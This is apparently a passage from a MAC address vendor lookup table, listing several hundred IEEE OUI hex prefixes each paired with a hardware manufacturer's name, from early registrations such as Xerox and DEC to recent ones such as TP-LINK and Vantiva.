Imagenics, Co., Ltd. 000328 Mace Group, Inc. 00032B GAI Datenfunksysteme GmbH 00032C ABB Switzerland Ltd 000323 Cornet Technology, Inc. 000387 Blaze Network Products 000381 Ingenico International 000380 SSH Communications Security Corp. 000382 A-One Co., Ltd. 00037A Taiyo Yuden Co., Ltd. 000375 NetMedia, Inc. 00037B IDEC IZUMI Corporation 00034A RIAS Corporation 000340 Floware Wireless Systems, Ltd. 0001EC Ericsson Group 000333 Digitel Co., Ltd. 000338 Oak Technology 000339 Eurologic Systems, Ltd. 000331 Cisco Systems, Inc 0003C4 Tomra Systems ASA 0003C5 Mobotix AG 0003BF Centerpoint Broadband Technologies, Inc. 0003B9 Hualong Telecom Co., Ltd. 0003BA Oracle Corporation 0003AF Paragea Communications 000367 Jasmine Networks, Inc. 00036A Mainnet, Ltd. 00036B Cisco Systems, Inc 00036C Cisco Systems, Inc 000391 Advanced Digital Broadcast, Ltd. 00038F Weinschel Corporation 000384 AETA 00035A Photron Limited 000353 Mitac, Inc. 00034F Sur-Gard Security 00030B Hunter Technology, Inc. 0003C9 TECOM Co., Ltd. 0003C1 Packet Dynamics Ltd 0003AC Fronius Schweissmaschinen 000399 Dongju Informations & Communications Co., Ltd. 0002BD Bionet Co., Ltd. 0002BE Totsu Engineering, Inc. 0002B9 Cisco Systems, Inc 0002BA Cisco Systems, Inc 0002B6 Acrosser Technology Co., Ltd. 0002B1 Anritsu, Ltd. 0002AD HOYA Corporation 0002AE Scannex Electronics Ltd. 00030A Argus Technologies 000304 Pacific Broadband Communications 000301 EXFO 0002FD Cisco Systems, Inc 000300 Barracuda Networks, Inc. 0002F9 MIMOS Berhad 0002F3 Media Serve Co., Ltd. 00031E Optranet, Inc. 000315 Cidco Incorporated 000319 Infineon AG 000313 Access Media SPA 000310 E-Globaledge Corporation 0002CF ZyGate Communications, Inc. 0002D1 Vivotek, Inc. 0002C2 Net Vision Telecom 0002A2 Hilscher GmbH 00029A Storage Apps 00028F Globetek, Inc. 00025A Catena Networks 00026E NeGeN Access, Inc. 000270 Crewave Co., Ltd. 0002EA Focus Enhancements 0002E7 CAB GmbH & Co KG 0002DF Net Com Systems, Inc. 0002DB NETSEC 000263 UPS Manufacturing SRL 000287 Adapcom 000281 Madge Ltd. 000254 WorldGate 00024B Cisco Systems, Inc 00024D Mannesman Dematic Colby Pty. Ltd. 000250 Geyser Networks, Inc. 000248 Pilz GmbH & Co. 00024C SiByte, Inc. 000240 Seedek Co., Ltd. 0001E4 Sitera, Inc. 0001F3 QPS, Inc. 0001E3 Siemens AG 0001EB C-COM Corporation 0001F2 Mark of the Unicorn, Inc. 0001D8 Teltronics, Inc. 0001D9 Sigma, Inc. 0001C5 Simpler Networks 0001C9 Cisco Systems, Inc 0001C4 NeoWave, Inc. 0001AB Main Street Networks 0001AF Artesyn Embedded Technologies 00018A ROI COMPUTER AG 000192 Texas Digital Systems 000221 DSP Application, Ltd. 000215 Cotas Computer Technology A/B 000205 Hitachi Denshi, Ltd. 00023B Ericsson 000239 Visicom 000233 Mantra Communications, Inc. 00022A Asound Electronic 00021B Kollmorgen-Servotronix 00021E SIMTEL S.R.L. 0001F7 Image Display Systems, Inc. 000200 Net & Sys Co., Ltd. 0001C1 Vitesse Semiconductor Corporation 0001B6 SAEJIN T&M Co., Ltd. 000182 DICA TECHNOLOGIES AG 000189 Refraction Technology, Inc. 000193 Hanbyul Telecom Co., Ltd. 0030F5 Wild Lab. Ltd. 00019C JDS Uniphase Inc. 0001A3 GENESYS LOGIC, INC. 00018C Mega Vision 00018F Kenetec, Inc. 00017B Heidelberger Druckmaschinen AG 00B069 Honewell Oy 00B0C2 Cisco Systems, Inc 00B03B HiQ Networks 00B086 LocSoft Limited 000133 KYOWA Electronic Instruments C 00013C TIW SYSTEMS 00014C Berkeley Process Control 00013D RiscStation Ltd. 000143 Cisco Systems, Inc 00014B Ennovate Networks, Inc. 00015C CADANT INC. 000169 Celestix Networks Pte Ltd. 00016B LightChip, Inc. 000145 WINSYSTEMS, INC. 000137 IT Farm Corporation 000104 DVICO Co., Ltd. 00010E Bri-Link Technologies Co., Ltd 000106 Tews Datentechnik GmbH 000109 Nagano Japan Radio Co., Ltd. 00029C 3COM 00B019 UTC CCS 00B0C7 Tellabs Operations, Inc. 00B02A ORSYS GmbH 00015D Oracle Corporation 000173 AMCC 00016C FOXCONN 000175 Radiant Communications Corp. 000120 OSCILLOQUARTZ S.A. 000127 OPEN Networks Pty Ltd 0001A5 Nextcomm, Inc. 000190 SMK-M 003046 Controlled Electronic Manageme 003075 ADTECH 003098 Global Converging Technologies 00300D MMC Technology, Inc. 003086 Transistor Devices, Inc. 0030C2 COMONE 0030F3 At Work Computers 0030CC Tenor Networks, Inc. 0030B0 Convergenet Technologies 0030A2 Lightner Engineering 003042 DeTeWe-Deutsche Telephonwerke 003037 Packard Bell Nec Services 003057 QTelNet, Inc. 0030FC Terawave Communications, Inc. 0030EC BORGARDT 003034 SET ENGINEERING 00308D Pinnacle Systems, Inc. 00304A Fraunhofer IPMS 00306F SEYEON TECH. CO., LTD. 00303D IVA CORPORATION 0030F4 STARDOT TECHNOLOGIES 003019 Cisco Systems, Inc 003076 Akamba Corporation 0030F6 SECURELOGIX CORPORATION 0030D6 MSC VERTRIEBS GMBH 003041 SAEJIN T & M CO., LTD. 0030EB TURBONET COMMUNICATIONS, INC. 0030A1 WEBGATE Inc. 00306A PENTA MEDIA CO., LTD. 003053 Basler AG 0030D2 WIN TECHNOLOGIES, CO., LTD. 003097 AB Regin 00305F Hasselblad 0030DC RIGHTECH CORPORATION 003025 CHECKOUT COMPUTER SYSTEMS, LTD 0030C6 CONTROL SOLUTIONS, INC. 0030E3 SEDONA NETWORKS CORP. 0030BF MULTIDATA GMBH 003012 DIGITAL ENGINEERING LTD. 00D016 SCM MICROSYSTEMS, INC. 00D043 ZONAL RETAIL DATA SYSTEMS 00D0C1 HARMONIC DATA SYSTEMS, LTD. 00D035 BEHAVIOR TECH. COMPUTER CORP. 00D0DB MCQUAY INTERNATIONAL 00308C Quantum Corporation 00303C ONNTO CORP. 003024 Cisco Systems, Inc 0030D8 SITEK 003016 ISHIDA CO., LTD. 00D00F SPEECH DESIGN GMBH 003058 API MOTION 0030A6 VIANET TECHNOLOGIES, LTD. 00D0BF PIVOTAL TECHNOLOGIES 00D019 DAINIPPON SCREEN CORPORATE 00D013 PRIMEX AEROSPACE COMPANY 00D0A3 VOCAL DATA, INC. 00D02F VLSI TECHNOLOGY INC. 00D0CB DASAN CO., LTD. 00D0C3 VIVID TECHNOLOGY PTE, LTD. 00D0C8 Prevas A/S 00D070 LONG WELL ELECTRONICS CORP. 00D029 WAKEFERN FOOD CORPORATION 00D0B1 OMEGA ELECTRONICS SA 005065 TDK-Lambda Corporation 0050B9 XITRON TECHNOLOGIES, INC. 00506B SPX-ATEG 00504A ELTECO A.S. 0050C1 GEMFLEX NETWORKS, LTD. 005075 KESTREL SOLUTIONS 00D0C0 Cisco Systems, Inc 00D076 Bank of America 00D051 O2 MICRO, INC. 00D0BB Cisco Systems, Inc 00D06E TRENDVIEW RECORDERS LTD. 00D05C KATHREIN TechnoTrend GmbH 00D05E STRATABEAM TECHNOLOGY, INC. 00D0AA CHASE COMMUNICATIONS 00D0FA Thales e-Security Ltd. 00D0EB LIGHTERA NETWORKS, INC. 00D006 Cisco Systems, Inc 00D02A Voxent Systems Ltd. 00D08F ARDENT TECHNOLOGIES, INC. 00D068 IWILL CORPORATION 00D07E KEYCORP LTD. 00D0EA NEXTONE COMMUNICATIONS, INC. 00D020 AIM SYSTEM, INC. 00D064 MULTITEL 00D0A1 OSKAR VIERLING GMBH + CO. KG 00D05D INTELLIWORXX, INC. 0050A1 CARLO GAVAZZI, INC. 005017 RSR S.R.L. 00D0AC Commscope, Inc 00D0BC Cisco Systems, Inc 0050ED ANDA NETWORKS 005096 SALIX TECHNOLOGIES, INC. 0090B4 WILLOWBROOK TECHNOLOGIES 009003 APLIO 009031 MYSTICOM, LTD. 00909D NovaTech Process Solutions, LLC 0090DD MIHARU COMMUNICATIONS Inc 009028 NIPPON SIGNAL CO., LTD. 00907D Lake Communications 0090C9 DPAC Technologies 00901D PEC (NZ) LTD. 0050F2 MICROSOFT CORP. 005029 1394 PRINTER WORKING GROUP 005081 MURATA MACHINERY, LTD. 0050AC MAPLE COMPUTER CORPORATION 005049 Arbor Networks Inc 0050A3 TransMedia Communications, Inc. 00505C TUNDO CORPORATION 0050B3 VOICEBOARD CORPORATION 00508C RSI SYSTEMS 0050E1 NS TECH ELECTRONICS SDN BHD 0050DE SIGNUM SYSTEMS CORP. 00507B MERLOT COMMUNICATIONS 0050CD DIGIANSWER A/S 00502D ACCEL, INC. 00503A DATONG ELECTRONICS LTD. 005087 TERASAKI ELECTRIC CO., LTD. 00500D SATORI ELECTORIC CO., LTD. 0050CF VANLINK COMMUNICATION TECHNOLOGY RESEARCH INSTITUTE 0050A4 IO TECH, INC. 005026 COSYSTEMS, INC. 00902C DATA & CONTROL EQUIPMENT LTD. 0090BD OMNIA COMMUNICATIONS, INC. 005024 NAVIC SYSTEMS, INC. 005012 CBL - GMBH 009002 ALLGON AB 0090FC NETWORK COMPUTING DEVICES 009014 ROTORK INSTRUMENTS, LTD. 009025 BAE Systems Australia (Electronic Systems) Pty Ltd 00904C Epigram, Inc. 009084 ATECH SYSTEM 00906A TURNSTONE SYSTEMS, INC. 00907E VETRONIX CORP. 009050 Teleste Corporation 00902A COMMUNICATION DEVICES, INC. 0090CF NORTEL 009072 SIMRAD AS 00900D Overland Storage Inc. 00902F NETCORE SYSTEMS, INC. 009098 SBC DESIGNS, INC. 009045 Marconi Communications 00908B Tattile SRL 009044 ASSURED DIGITAL, INC. 009036 ens, inc. 00907C DIGITALCAST, INC. 00908E Nortel Networks Broadband Access 009009 I Controls, Inc. 0090D2 Artel Video Systems 009026 ADVANCED SWITCHING COMMUNICATIONS, INC. 0090D3 GIESECKE & DEVRIENT GmbH 009067 WalkAbout Computers, Inc. 009033 INNOVAPHONE AG 009087 ITIS 00904D SPEC S.A. 0090FD CopperCom, Inc. 009039 SHASTA NETWORKS 009091 DigitalScape, Inc. 009097 Sycamore Networks 00908D VICKERS ELECTRONICS SYSTEMS 009042 ECCS, Inc. 009051 ULTIMATE TECHNOLOGY CORP. 0001FE DIGITAL EQUIPMENT CORPORATION 0090BE IBC/INTEGRATED BUSINESS COMPUTERS 0090DE CARDKEY SYSTEMS, INC. 00906B APPLIED RESOURCES, INC. 009066 Troika Networks, Inc. 000629 IBM Corp 0010A9 ADHOC TECHNOLOGIES 00108A TeraLogic, Inc. 001024 NAGOYA ELECTRIC WORKS CO., LTD 0010D6 Exelis 001048 HTRC AUTOMATION, INC. 001097 WinNet Metropolitan Communications Systems, Inc. 001085 POLARIS COMMUNICATIONS, INC. 001094 Performance Analysis Broadband, Spirent plc 001050 RION CO., LTD. 00109C M-SYSTEM CO., LTD. 0010CE VOLAMP, LTD. 0010B2 COACTIVE AESTHETICS 00106E TADIRAN COM. LTD. 00109A NETLINE 001006 Thales Contact Solutions Ltd. 00100C ITO CO., LTD. 00106F TRENTON TECHNOLOGY INC. 001034 GNP Computers 001044 InnoLabs Corporation 001089 WebSonic 0010A1 KENDIN SEMICONDUCTOR, INC. 00105F ZODIAC DATA SYSTEMS 00103E NETSCHOOLS CORPORATION 0010CB FACIT K.K. 001019 SIRONA DENTAL SYSTEMS GmbH & Co. KG 00107F CRESTRON ELECTRONICS, INC. 0010D4 STORAGE COMPUTER CORPORATION 0010E2 ArrayComm, Inc. 0010E0 Oracle Corporation 00107C P-COM, INC. 0010BD THE TELECOMMUNICATION TECHNOLOGY COMMITTEE (TTC) 001008 VIENNA SYSTEMS CORPORATION 0010D1 Top Layer Networks, Inc. 00106A DIGITAL MICROWAVE CORPORATION 0010D2 NITTO TSUSHINKI CO., LTD 0010D9 IBM JAPAN, FUJISAWA MT+D 00103C IC ENSEMBLE, INC. 001038 Micro Research Ltd. 0010A8 RELIANCE COMPUTER CORP. 00103B HIPPI NETWORKING FORUM 00E0AD EES TECHNOLOGY, LTD. 00E094 OSAI SRL 00E032 MISYS FINANCIAL SYSTEMS, LTD. 00E0C0 SEIWA ELECTRIC MFG. CO., LTD. 00E027 DUX, INC. 00E044 LSICS CORPORATION 00E0CA BEST DATA PRODUCTS 00E0A7 IPC INFORMATION SYSTEMS, INC. 00E0EB DIGICOM SYSTEMS, INCORPORATED 00E0D1 TELSIS LIMITED 00E0F0 ABLER TECHNOLOGY, INC. 00E002 CROSSROADS SYSTEMS, INC. 00E0D6 COMPUTER & COMMUNICATION RESEARCH LAB. 00E0B7 Cosworth Electronics Ltd 00E083 JATO TECHNOLOGIES, INC. 00E072 LYNK 00E04B JUMP INDUSTRIELLE COMPUTERTECHNIK GmbH 00E074 TIERNAN COMMUNICATIONS, INC. 00E0D9 TAZMO CO., LTD. 00E055 INGENIERIA ELECTRONICA COMERCIAL INELCOM S.A. 00E042 Pacom Systems Ltd. 00E097 CARRIER ACCESS CORPORATION 00E089 ION Networks, Inc. 00E070 DH TECHNOLOGY 00E05C PHC Corporation 00E0B4 TECHNO SCOPE CO., LTD. 00E071 EPIS MICROCOMPUTER 00E066 ProMax Systems, Inc. 00E073 NATIONAL AMUSEMENT NETWORK, INC. 00E06A KAPSCH AG 00E001 STRAND LIGHTING LIMITED 00E0D8 LANBit Computer, Inc. 00E01F AVIDIA Systems, Inc. 00E0D0 NETSPEED, INC. 00E093 ACKFIN NETWORKS 0060F4 ADVANCED COMPUTER SOLUTIONS, Inc. 006060 Data Innovations North America 0060F7 DATAFUSION SYSTEMS 006020 PIVOTAL NETWORKING, INC. 0060C0 Nera Networks AS 00600E WAVENET INTERNATIONAL, INC. 006035 DALLAS SEMICONDUCTOR, INC. 006007 ACRES GAMING, INC. 006058 COPPER MOUNTAIN COMMUNICATIONS, INC. 0060A0 SWITCHED NETWORK TECHNOLOGIES, INC. 006017 TOKIMEC INC. 006026 VIKING Modular Solutions 006019 Roche Diagnostics 006059 TECHNICAL COMMUNICATIONS CORP. 006003 TERAOKA WEIGH SYSTEM PTE, LTD. 00607A DVS GMBH 006066 LACROIX Trafic 0060D7 ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE (EPFL) 0060F3 Performance Analysis Broadband, Spirent plc 00607C WaveAccess, Ltd. 006073 REDCREEK COMMUNICATIONS, INC. 0060FD NetICs, Inc. 00606E DAVICOM SEMICONDUCTOR, INC. 0060C7 AMATI COMMUNICATIONS CORP. 1000E8 NATIONAL SEMICONDUCTOR 0060FB PACKETEER, INC. 0060C1 WaveSpan Corporation 00603C HAGIWARA SYS-COM CO., LTD. 00607D SENTIENT NETWORKS INC. 00E060 SHERWOOD 00E021 FREEGATE CORP. 00E0BA BERGHOF AUTOMATIONSTECHNIK GmbH 00E05B WEST END SYSTEMS CORP. 00E062 HOST ENGINEERING 00E0CE ARN 00E05F e-Net, Inc. 00E0E7 RAYTHEON E-SYSTEMS, INC. 00E03C AdvanSys 00E024 GADZOOX NETWORKS 00605B IntraServer Technology, Inc. 00A078 Marconi Communications 00A0BF WIRELESS DATA GROUP MOTOROLA 00A05F BTG Electronics Design BV 00A0CD DR. JOHANNES HEIDENHAIN GmbH 00A0DA INTEGRATED SYSTEMS Technology, Inc. 00A02A TRANCELL SYSTEMS 00A01C NASCENT NETWORKS CORPORATION 0060C8 KUKA WELDING SYSTEMS & ROBOTS 006023 PERICOM SEMICONDUCTOR CORP. 006063 PSION DACOM PLC. 006031 HRK SYSTEMS 0060ED RICARDO TEST AUTOMATION LTD. 006012 POWER COMPUTING CORPORATION 00604D MMC NETWORKS, INC. 0060A3 CONTINUUM TECHNOLOGY CORP. 00603D 3CX 0060AB LARSCOM INCORPORATED 00605A CELCORE, INC. 006095 ACCU-TIME SYSTEMS, INC. 0060CB HITACHI ZOSEN CORPORATION 00A08F DESKNET SYSTEMS, INC. 00A0CC LITE-ON COMMUNICATIONS, INC. 00A0B7 CORDANT, INC. 00A056 MICROPROSS 00A0E1 WESTPORT RESEARCH ASSOCIATES, INC. 00A09A NIHON KOHDEN AMERICA 006077 PRISA NETWORKS 006094 IBM Corp 0060DD MYRICOM, INC. 006046 VMETRO, INC. 00608A CITADEL COMPUTER 006093 VARIAN 00A03F COMPUTER SOCIETY MICROPROCESSOR & MICROPROCESSOR STANDARDS C 00A02D 1394 Trade Association 00A07C TONYANG NYLON CO., LTD. 00A0E6 DIALOGIC CORPORATION 00A04A NISSHIN ELECTRIC CO., LTD. 00A035 CYLINK CORPORATION 00A03D OPTO-22 00A026 TELDAT, S.A. 00A023 APPLIED CREATIVE TECHNOLOGY, INC. 00A089 XPOINT TECHNOLOGIES, INC. 00A007 APEXX TECHNOLOGY, INC. 00A047 INTEGRATED FITNESS CORP. 00A032 GES SINGAPORE PTE. LTD. 00A0E3 XKL SYSTEMS CORP. 00A014 CSIR 00A015 WYLE 00A06A Verilink Corporation 00A070 COASTCOM 00A018 CREATIVE CONTROLLERS, INC. 00A0FE BOSTON TECHNOLOGY, INC. 00A0EB Encore Networks, Inc. 00A07D SEEQ TECHNOLOGY, INC. 00A0D9 CONVEX COMPUTER CORPORATION 00209A THE 3DO COMPANY 0020DE JAPAN DIGITAL LABORAT'Y CO.LTD 00200B OCTAGON SYSTEMS CORP. 002094 CUBIX CORPORATION 0020F7 CYBERDATA CORPORATION 0020D7 JAPAN MINICOMPUTER SYSTEMS CO., Ltd. 0020C3 COUNTER SOLUTIONS LTD. 002062 SCORPION LOGIC, LTD. 002081 TITAN ELECTRONICS 0020D9 PANASONIC TECHNOLOGIES, INC./MIECO-US 00207E FINECOM CO., LTD. 0020AD LINQ SYSTEMS 00207D ADVANCED COMPUTER APPLICATIONS 00202F ZETA COMMUNICATIONS, LTD. 0020C0 PULSE ELECTRONICS, INC. 002047 STEINBRECHER CORP. 0020D5 VIPA GMBH 00201A MRV Communications, Inc. 0020F2 Oracle Corporation 0020B8 PRIME OPTION, INC. 00206F FLOWPOINT CORPORATION 002020 MEGATRON COMPUTER INDUSTRIES PTY, LTD. 00201B NORTHERN TELECOM/NETWORK 0020FB OCTEL COMMUNICATIONS CORP. 002070 HYNET, LTD. 0020BE LAN ACCESS CORP. 00204A PRONET GMBH 0020FF SYMMETRICAL TECHNOLOGIES 002044 GENITECH PTY LTD 0020A1 DOVATRON 0020F3 RAYNET CORPORATION 002090 ADVANCED COMPRESSION TECHNOLOGY, INC. 002053 HUNTSVILLE MICROSYSTEMS, INC. 002001 DSP SOLUTIONS, INC. 0020BF AEHR TEST SYSTEMS 00204E NETWORK SECURITY SYSTEMS, INC. 0020CA DIGITAL OCEAN 002095 RIVA ELECTRONICS 00203F JUKI CORPORATION 00C00F QUANTUM SOFTWARE SYSTEMS LTD. 00C087 UUNET TECHNOLOGIES, INC. 00C006 NIPPON AVIONICS CO., LTD. 00C0A4 UNIGRAF OY 00C029 Nexans Deutschland GmbH - ANS 00C0FA CANARY COMMUNICATIONS, INC. 00C02F OKUMA CORPORATION 00C01E LA FRANCAISE DES JEUX 00C0E1 SONIC SOLUTIONS 0020A9 WHITE HORSE INDUSTRIAL 002096 Invensys 0020EF USC CORPORATION 002030 ANALOG & DIGITAL SYSTEMS 0020AC INTERFLEX DATENSYSTEME GMBH 0020D8 Nortel Networks 002066 GENERAL MAGIC, INC. 002036 BMC SOFTWARE 0020F8 CARRERA COMPUTERS, INC. 00C065 SCOPE COMMUNICATIONS, INC. 00C079 FONSYS CO.,LTD. 00C053 Aspect Software Inc. 00C0CC TELESCIENCES CO SYSTEMS, INC. 00C0CE CEI SYSTEMS & ENGINEERING PTE 00C08E NETWORK INFORMATION TECHNOLOGY 00C0DD QLogic Corporation 00C01B SOCKET COMMUNICATIONS, INC. 00406F SYNC RESEARCH INC. 00404F SPACE & NAVAL WARFARE SYSTEMS 00408F WM-DATA MINFO AB 0040D7 STUDIO GEN INC. 004057 LOCKHEED - SANDERS 00C0C4 COMPUTER OPERATIONAL 00C012 NETSPAN CORPORATION 00C0D9 QUINTE NETWORK CONFIDENTIALITY 00C0B1 GENIUS NET CO. 00C0D2 SYNTELLECT, INC. 00C07E KUBOTA CORPORATION ELECTRONIC 00C0C7 SPARKTRUM MICROSYSTEMS, INC. 0040F3 NETCOR 00404B MAPLE COMPUTER SYSTEMS 004033 ADDTRON TECHNOLOGY CO., LTD. 00C040 ECCI 00C01C INTERLINK COMMUNICATIONS LTD. 00C096 TAMURA CORPORATION 00C04E COMTROL CORPORATION 004017 Silex Technology America 00C0E6 Verilink Corporation 00C042 DATALUX CORP. 00C071 AREANEX COMMUNICATIONS, INC. 00C03F STORES AUTOMATED SYSTEMS, INC. 00C036 RAYTECH ELECTRONIC CORP. 00C0A2 INTERMEDIUM A/S 00C044 EMCOM CORPORATION 0040AD SMA REGELSYSTEME GMBH 00406D LANCO, INC. 0040CD TERA MICROSYSTEMS, INC. 0040F5 OEM ENGINES 004039 OPTEC DAIICHI DENKO CO., LTD. 004079 JUKO MANUFACTURE COMPANY, LTD. 004059 YOSHIDA KOGYO K. K. 004068 EXTENDED SYSTEMS 004078 WEARNES AUTOMATION PTE LTD 0040F8 SYSTEMHAUS DISCOM 004024 COMPAC INC. 0040D2 PAGINE CORPORATION 0040E9 ACCORD SYSTEMS, INC. 004003 Emerson Process Management Power & Water Solutions, Inc. 004090 ANSEL COMMUNICATIONS 00407C QUME CORPORATION 00C020 ARCO ELECTRONIC, CONTROL LTD. 00C0E7 FIBERDATA AB 00C05F FINE-PAL COMPANY LIMITED 0040F6 KATRON COMPUTERS INC. 004086 MICHELS & KLEBERHOFF COMPUTER 004092 ASP COMPUTER PRODUCTS, INC. 0040B0 BYTEX CORPORATION, ENGINEERING 0080D9 EMK Elektronik GmbH & Co. KG 0040F4 CAMEO COMMUNICATIONS, INC. 0040B4 NEXTCOM K.K. 0040AE DELTA CONTROLS, INC. 00407F FLIR Systems 004095 R.P.T. INTERGROUPS INT'L LTD. 004035 OPCOM 00405C FUTURE SYSTEMS, INC. 004061 DATATECH ENTERPRISES CO., LTD. 00008C Alloy Computer Products (Australia) Pty Ltd 0040C5 MICOM COMMUNICATIONS INC. 004020 CommScope Inc 0040A0 GOLDSTAR CO., LTD. 0040FC IBR COMPUTER TECHNIK GMBH 0040DE Elsag Datamat spa 0040C9 NCUBE 0040DF DIGALOG SYSTEMS, INC. 0040BB GOLDSTAR CABLE CO., LTD. 0040B1 CODONICS INC. 008084 THE CLOUD INC. 0080A6 REPUBLIC TECHNOLOGY, INC. 004044 QNIX COMPUTER CO., LTD. 004009 TACHIBANA TECTRON CO., LTD. 008032 ACCESS CO., LTD. 0080CF EMBEDDED PERFORMANCE INC. 008090 MICROTEK INTERNATIONAL, INC. 0080C4 DOCUMENT TECHNOLOGIES, INC. 00805B CONDOR SYSTEMS, INC. 008043 NETWORLD, INC. 0080AF ALLUMER CO., LTD. 004048 SMD INFORMATICA S.A. 00402D HARRIS ADACOM CORPORATION 0040B9 MACQ ELECTRONIQUE SA 0080D2 SHINNIHONDENKO CO., LTD. 008089 TECNETICS (PTY) LTD. 00806F ONELAN LTD. 008081 KENDALL SQUARE RESEARCH CORP. 00809C LUXCOM, INC. 008065 CYBERGRAPHIC SYSTEMS PTY LTD. 008019 DAYNA COMMUNICATIONS, INC. 000041 ICE CORPORATION 000086 MEGAHERTZ CORPORATION 000092 COGENT DATA TECHNOLOGIES 000058 RACORE COMPUTER PRODUCTS INC. 0080CE BROADCAST TELEVISION SYSTEMS 00801A BELL ATLANTIC 0080EE THOMSON CSF 00808E RADSTONE TECHNOLOGY 008096 HUMAN DESIGNED SYSTEMS, INC. 0080DA Hottinger Brüel & Kjær A/S 00803E SYNERNETICS 008050 ZIATECH CORPORATION 0080A4 LIBERTY ELECTRONICS 0080F3 SUN ELECTRONICS CORP. 008099 Eaton Industries GmbH 00800C VIDECOM LIMITED 00807D EQUINOX SYSTEMS INC. 008063 Hirschmann Automation and Control GmbH 008074 FISHER CONTROLS 008030 NEXUS ELECTRONICS 000055 COMMISSARIAT A L`ENERGIE ATOM. 0080CD MICRONICS COMPUTER, INC. 008003 HYTEC ELECTRONICS LTD. 0080C9 ALBERTA MICROELECTRONIC CENTRE 00808D WESTCOAST TECHNOLOGY B.V. 0080BE ARIES RESEARCH 008015 SEIKO SYSTEMS, INC. 0080DE GIPSI S.A. 008064 WYSE TECHNOLOGY LLC 008048 COMPEX INCORPORATED 008085 H-THREE SYSTEMS CORPORATION 00804C CONTEC CO., LTD. 00808F C. ITOH ELECTRONICS, INC. 000052 Intrusion.com, Inc. 0080FF SOC. DE TELEINFORMATIQUE RTC 008052 TECHNICALLY ELITE CONCEPTS 00805D CANSTAR 00804F DAIKIN INDUSTRIES, LTD. 008005 CACTUS COMPUTER INC. 00806D CENTURY SYSTEMS CORP. 008094 ALFA LAVAL AUTOMATION AB 008002 SATELCOM (UK) LTD 0000CF HAYES MICROCOMPUTER PRODUCTS 0000EF KTI 000025 RAMTEK CORP. 000024 CONNECT AS 0000F7 YOUTH KEEP ENTERPRISE CO LTD 0000C7 ARIX CORPORATION 0000D1 ADAPTEC INCORPORATED 000016 DU PONT PIXEL SYSTEMS . 000037 OXFORD METRICS LIMITED 0000FB RECHNER ZUR KOMMUNIKATION 00000D FIBRONICS LTD. 00000A OMRON TATEISI ELECTRONICS CO. 0000E2 ACER TECHNOLOGIES CORP. 0000E1 GRID SYSTEMS 000081 Bay Networks 000029 IMC NETWORKS CORP. 000067 SOFT * RITE, INC. 0000D2 SBE, INC. 0000BA SIIG, INC. 0000AF Canberra Industries, Inc. 000076 ABEKAS VIDEO SYSTEM 0000B0 RND-RAD NETWORK DEVICES 00002A TRW - SEDD/INP 00002C AUTOTOTE LIMITED 00006C Private 0000A9 NETWORK SYSTEMS CORP. 08007B SANYO ELECTRIC CO. LTD. 08007C VITALINK COMMUNICATIONS CORP. 080077 TSL COMMUNICATIONS LTD. 080074 CASIO COMPUTER CO. LTD. 08006E MASSCOMP 080068 RIDGE COMPUTERS 080063 PLESSEY 080060 INDUSTRIAL NETWORKING INC. 080055 STANFORD TELECOMM. INC. 080053 MIDDLE EAST TECH. UNIVERSITY 08004C HYDRA COMPUTER SYSTEMS INC. 080047 SEQUENT COMPUTER SYSTEMS INC. 08004A BANYAN SYSTEMS INC. 080044 DAVID SYSTEMS INC. 080041 RACAL-MILGO INFORMATION SYS.. 0000F3 GANDALF DATA LIMITED 08008E Tandem Computers 080084 TOMEN ELECTRONICS CORP. 080085 ELXSI 080082 VERITAS SOFTWARE 080080 AES DATA INC. 0000DF BELL & HOWELL PUB SYS DIV 0000F9 QUOTRON SYSTEMS INC. 080035 MICROFIVE CORPORATION 080032 TIGAN INCORPORATED 080030 CERN 08008D XYVISION INC. 080015 STC BUSINESS SYSTEMS 080042 MACNICA, Inc. 080066 AGFA CORPORATION 00DD01 UNGERMANN-BASS INC. 08008A PerfTech, Inc. 00DD06 UNGERMANN-BASS INC. 02BB01 OCTOTHORPE CORP. 00003E SIMPACT AA0003 DIGITAL EQUIPMENT CORPORATION 000000 XEROX CORPORATION 080021 3M COMPANY 026086 LOGIC REPLACEMENT TECH. LTD. 00DD02 UNGERMANN-BASS INC. 00DD04 UNGERMANN-BASS INC. 0001C8 CONRAD CORP. 08003F FRED KOSCHARA ENTERPRISES 08000B UNISYS CORPORATION 840F2A Jiangxi Risound Electronics Co., LTD 485F08 TP-LINK TECHNOLOGIES CO.,LTD. F86FB0 TP-LINK TECHNOLOGIES CO.,LTD. 3447D4 Chengdu Quanjing Intelligent Technology Co.,Ltd 048727 Silicon Laboratories C8A608 Ruckus Wireless AC3B96 NXP Semiconductor (Tianjin) LTD. 0C6714 SERNET (SUZHOU) TECHNOLOGIES CORPORATION 90F891 Kaon Group Co., Ltd. 9877E7 Kaon Group Co., Ltd. 840112 Kaon Group Co., Ltd. 1834AF Kaon Group Co., Ltd. 64FB01 Zhongshan Camry Electronic Company Limited 684724 EM Microelectronic 38F6CF zte corporation 9C2DCD LCFC(HeFei) Electronics Technology co., ltd 6C2408 LCFC(HeFei) Electronics Technology co., ltd 88A4C2 LCFC(HeFei) Electronics Technology co., ltd CC5763 Panasonic Automotive Systems Co.,Ltd 90D092 HUMAX Co., Ltd. 8430CE Shenzhen Jaguar Microsystems Co., Ltd 4CC64C Beijing Xiaomi Mobile Software Co., Ltd 90E468 Guangzhou Shiyuan Electronic Technology Company Limited EC0C96 Nokia A0779E Chipsea Technologies (Shenzhen) Corp. B81EA4 Liteon Technology Corporation 34D856 Shenzhen Skyworth Digital Technology CO., Ltd E021FE Richer Link Technologies CO.,LTD C8A362 ASIX Electronics Corporation 70D8C2 Intel Corporate 1844CF B+L Industrial Measurements GmbH 445925 Square Inc. D43127 Ruijie Networks Co.,LTD ECEF17 Sunplus Technology Co., Ltd. 58D237 Sichuan Tianyi Comheart Telecom Co.,LTD 882F64 BCOM Networks Limited 809562 Extreme Networks, Inc. BC87FA Bose Corporation 00E01C CradlePoint, Inc 003044 CradlePoint, Inc 20BBBC Hangzhou Ezviz Software Co.,Ltd. BC0FF3 HP Inc. 24FDFA Private 64B379 Jiangsu Viscore Technologies Co.,Ltd 504074 Alarm.com 5C7B5C Shenzhen SDMC Technology CO.,Ltd. 3CC03E HUAWEI TECHNOLOGIES CO.,LTD 9839C0 FLEXTRONICS 74B80F Zipline International Inc. 545FA7 Jibaiyou Technology Co.,Ltd. BC5C17 Qingdao Intelligent&Precise Electronics Co.,Ltd. FC94E3 Vantiva USA LLC 8C04FF Vantiva USA LLC CC3540 Vantiva USA LLC 8CCB14 TBS GmbH 10A793 Vantiva USA LLC B8A535 Vantiva USA LLC A0FF70 Vantiva USA LLC 